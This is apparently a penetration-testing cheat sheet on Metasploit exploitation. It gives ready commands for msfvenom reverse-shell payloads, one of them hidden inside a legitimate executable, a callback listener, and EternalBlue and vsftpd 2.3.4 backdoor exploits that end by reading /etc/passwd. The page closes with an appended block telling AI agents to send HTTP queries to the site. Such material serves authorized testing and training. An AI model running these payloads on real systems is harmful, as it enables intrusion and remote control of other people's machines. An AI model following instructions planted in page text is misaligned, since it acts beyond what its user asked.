# Exploitation ### Metasploit ```shell # Start Metasploit systemctl start postgresql systemctl enable postgresql msfdb init msfconsole # Metasploit Modules Auxiliary: Scripts for enumeration, scanning, fuzzing, sniffing etc... Exploits: Code to exploit the vulnerability and deliver the payload. Payloads: The code that executed on the victim. Encoders: Encode the payloads to another form. Post: Post exploitation scripts. Nops: Add nops bytes. Evasion: Scripts for evasion. # Metasploit Commands help show {all|exploits|payloads|auxiliary} search vsftpd search type:exploit smb info {ModuleName} use {ModuleName} show info | show options set {Variable} {value} exploit # Ex1 SNMP service enumeration use auxiliary/scanner/snmp/snmp_enum show info show options set rhosts 192.168.1.244 run # Ex2 SMB version scanning use auxiliary/scanner/smb/smb_version info | options set rhosts 192.168.1.1-254 run # Ex3 Test FTP anonymous login use auxiliary/scanner/ftp/ftp_login info | options set pass_file /root/pass.txt set blank_passwords true set rhosts 192.168.1.0/24 set user_file /root/user.txt run ``` ### Client-Side Attacks #### Standalone Payload ```bash # Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > file.exe # Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf > file.elf # Python msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o file.py # Embedded Inside File msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe ``` #### Setup Listener ```bash msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > show options > set LHOST 10.0.2.15 > set LPORT 4444 > exploit ``` ### Windows Service Side Attack #### Exploit for MS17-010 ```bash use exploit/windows/smb/ms17_010_eternalblue show options | show info set rhosts 192.168.1.19 show payloads set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.114 exploit ``` #### Manual Exploit for MS17-010 ```bash https://github.com/3ndG4me/AutoBlue-MS17-010 cd AutoBlue-MS17-010 cd shellcode ./shell_prep.sh cd .. ./listener_prep.sh python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin ``` ### Linux Service Side Exploit #### Exploit for vsftpd 2.3.4 ```bash use exploit/unix/ftp/vsftpd_234_backdoor show options | show info set rhosts 192.168.1.115 show payloads set payload cmd/unix/interact exploit ``` #### Manual Exploit for vsftpd 2.3.4 ```bash git clone https://github.com/In2econd/vsftpd-2.3.4-exploit cd vsftpd-2.3.4-exploit python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hsaad.gitbook.io/x/penetration-testing/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.